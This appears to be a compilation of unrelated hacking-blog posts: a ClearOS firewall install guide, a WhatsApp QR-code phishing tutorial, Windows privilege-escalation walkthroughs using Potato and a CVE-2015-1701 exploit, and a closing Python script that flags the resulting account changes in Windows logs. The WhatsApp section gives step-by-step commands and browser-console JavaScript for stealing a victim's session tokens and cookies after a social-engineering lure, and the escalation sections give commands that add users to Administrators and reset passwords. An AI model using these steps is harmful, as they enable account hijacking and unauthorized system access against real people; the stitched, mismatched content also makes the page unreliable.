Setup Firewall Pentest Lab using Clear OS

ClearOS is a Linux-based server operating system for small businesses that comes with server, networking and gateway functions. ClearOS is available in Home, Business and free Community editions. It is normally managed from a web-based interface, but it can also be operated entirely from the command line. Mostly, though, ClearOS is used as a firewall.

Let’s see how to install Clear OS.

First, make a bootable disk or pen drive using YUMI or Rufus.

Then restart your computer and select: Install ClearOS

After selecting it, press Enter.

Select the language in which you are comfortable.

After that, the Installation Summary interface will appear.

Select Date and Time from the Localization section.

Then select Installation Source and click Done.

After that, select Network and Host Name. Turn on the interface and configure your network settings.

After setting everything, click Begin Installation and the installation will start. You also have to set a root password.

After the installation finishes, the system will reboot. ClearOS will then show you a link that contains its IP address. Open that link in a browser.

When you open that link in your browser, it will ask you to log in. Use root as the username and the password you set at installation time.

After logging in, you have to configure ClearOS.

Configure the network interfaces. Change the type to static, set the IP address to the one you set earlier and then click Next.

Select your Edition and click next.

Fill in the system registration form and click Next.

Now you have to set the hostname for your NICs (Network Interface Cards). Set a hostname for the internal and the external NIC and click Next.

After that, select and install from the Marketplace the apps required for monitoring and administration. When you finish the configuration, a simple dashboard will appear; from here you can use ClearOS as you need.

Author: Akshay Bhardwaj is a passionate Hacker, Information Security Researcher | Sketch Artist | Technical writer. You can follow him on LinkedIn and Facebook.

Hack anyone’s Whatsapp through QR code (Working)

Recently WhatsApp released an important update for its users: end-to-end encryption, which means it is impossible to decrypt the messages; even WhatsApp can’t decrypt them. This is really good news for every WhatsApp user.

But remember, “Security is just an illusion”. I’m saying this because there is a way by which WhatsApp can be hacked, and that is by phishing.

So let’s start. First download the Selenium standalone server jar file from here.

Then open a terminal and change to the directory where you downloaded the Selenium server file; in my case I downloaded it to my Desktop.

cd /root/Desktop/

Then type:

./selenium-server-standalone-2.53.0.jar

Now it will start the selenium server. Then open a new terminal and type:

git clone https://github.com/Mawalu/whatsapp-phishing.git

It will clone the whatsapp-phishing repository from GitHub. After that type:

cd whatsapp-phishing

Then type:

npm install

It will install everything required, like node.js and socket.io, which are needed to run the website and the Selenium server. If you encounter any “missing” error, you have to install the missing part manually. To do so, type:

npm install node.js

npm install socket.io

npm install wd

After installing, type in the terminal:

node index.js

It will start an HTTP server and a socket.io server.

Now open Mozilla Firefox and type in the address bar:

http://localhost:8080

When you press Enter, it will open a new browser, connect to web.whatsapp.com and generate a QR code in the browser. The generated phishing QR code continuously syncs with the web.whatsapp.com QR code.

Now send this QR code to a victim through a social engineering method. When the victim scans that QR code with their mobile WhatsApp scanner, WhatsApp will authenticate the browser controlled by the Selenium server, and the tool will then fetch the tokens and document.cookie from the victim’s WhatsApp.

Now you have to copy the tokens and document.cookie. There are two ways to see the stored tokens and document.cookie:

  1. The first way is to go to:

/root/whatsapp-phishing/

In the whatsapp-phishing directory a file named secrets is created automatically when the victim scans the phishing QR code; that file contains the token ID and document.cookie.

  2. The second way is to go to the terminal where js is running already. There you will find that some codes have been fetched; that is our goddam gold, meaning the victim’s token ID, which is what we require to get access to his/her WhatsApp account.

In both ways you will find that multiple token IDs have been fetched, but we only want the latest fetched token ID and document.cookie. So copy the last fetched token, which starts with {"s": and ends with "c":""}. See the picture for reference.

Then open the Firefox browser in incognito mode and open the link https://web.whatsapp.com/

After that, open developer mode in the browser, go to the console and type:

var t = PASTE_HERE _VICTIM_TOKEN-ID

Then type following code:

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}

And at last type:

>login (t)

Now reload the browser window and wait. Bannggg!! Automatically, after a few seconds, you will be logged in as the person who scanned the QR code (the phishing QR code that we created).

Enjoy. Stay tuned for more tutorials like this.

AUTHOR: Akshay Bhardwaj is an Information Security Enthusiast and Researcher | Sketch Artist | Technical writer.


Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato

First check the IP address of your local PC using the ipconfig command.

Now open a command prompt and type the net localgroup administrators command to check which users are members of the administrators group.

In my case I’m logged in as the RAAZ user, which is not a part of administrators.

Now download Potato.exe from here, go to the Potato folder from the command prompt and type:

Potato.exe -ip 192.168.1.9 -disable_exhaust true -cmd "C:\\windows\\System32\\cmd.exe /K net localgroup administrators RAAZ /add"

It will now open a firewall prompt; click Allow access.

Now type net localgroup administrators again; here you can see that my user RAAZ is also a member of administrators.

Hack Windows 7 Password from Guest Account using 2015-1701 Exploit (Easy Way)

From Wikipedia

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions.

Now type the net user command here to change the admin password; it will show you the error “Access is denied”.

Download the CVE 2015-1701 exploit from here and unzip it on your PC. Then go to the compiled folder in CVE Master. There you will find 2 exe files, one for 32-bit users and one for 64-bit users (in my case I’m using the 64-bit one).

Now run Taihou64.exe; it will open a command prompt with admin privileges. Now you can change the password using the net user command. An example is given below:

Syntax:

net user (username) *

Then press Enter.

Note: This trick works only on Windows 7 (all versions); it is not available for Windows 8 and Windows 10 yet.
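
Both the Potato walkthrough and the CVE 2015-1701 walkthrough above end with a net command typed into an elevated prompt, and that is the part a defender can see in the Security log. The following triage script is an added example, not part of the original posts or of either tool. It assumes the elevated prompt runs as Local System, that process-creation auditing with command lines is enabled, and it uses simplified, constructed event records with the field names of Windows Security events 4688, 4732 and 4724.

```python
import re

SYSTEM_SID = "S-1-5-18"              # Local System (well-known SID)
ADMINISTRATORS_SID = "S-1-5-32-544"  # BUILTIN\Administrators (well-known SID)

# The two net commands the page runs from the elevated prompt.
NET_GROUP_ADD = re.compile(
    r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)
NET_USER_PROMPT = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+\*", re.I)


def triage(events):
    """Return (reason, account) pairs for account changes made as SYSTEM."""
    findings = []
    for ev in events:
        # An administrator doing this by hand shows up under their own SID.
        # Assumption: the exploited prompt acts as Local System instead.
        if ev.get("SubjectUserSid") != SYSTEM_SID:
            continue
        event_id = ev.get("EventID")
        if event_id == 4732 and ev.get("TargetSid") == ADMINISTRATORS_SID:
            findings.append(("admin-group-add-by-system", ev["MemberSid"]))
        elif event_id == 4724:
            findings.append(("password-reset-by-system", ev["TargetUserName"]))
        elif event_id == 4688:
            cmd = ev.get("CommandLine", "")
            for reason, rx in (("net-localgroup-add", NET_GROUP_ADD),
                               ("net-user-password-change", NET_USER_PROMPT)):
                m = rx.search(cmd)
                if m:
                    findings.append((reason, m.group(1)))
    return findings


# Constructed sample records (not real logs); SIDs and admin1 are made up.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserSid": SYSTEM_SID, "CommandLine":
     r"C:\windows\System32\cmd.exe /K net localgroup administrators RAAZ /add"},
    {"EventID": 4732, "SubjectUserSid": SYSTEM_SID,
     "TargetSid": ADMINISTRATORS_SID, "MemberSid": "S-1-5-21-1-2-3-1001"},
    {"EventID": 4688, "SubjectUserSid": SYSTEM_SID,
     "CommandLine": "net user admin1 *"},
    {"EventID": 4724, "SubjectUserSid": SYSTEM_SID, "TargetUserName": "admin1"},
    # Same group change made by a named administrator: not flagged.
    {"EventID": 4732, "SubjectUserSid": "S-1-5-21-1-2-3-500",
     "TargetSid": ADMINISTRATORS_SID, "MemberSid": "S-1-5-21-1-2-3-1002"},
]

if __name__ == "__main__":
    for reason, account in triage(SAMPLE_EVENTS):
        print(f"{reason:28} {account}")
```

Group Policy and some management agents also change accounts as Local System, so treat a hit as a lead to check against the parent process and the logged-on user rather than as proof.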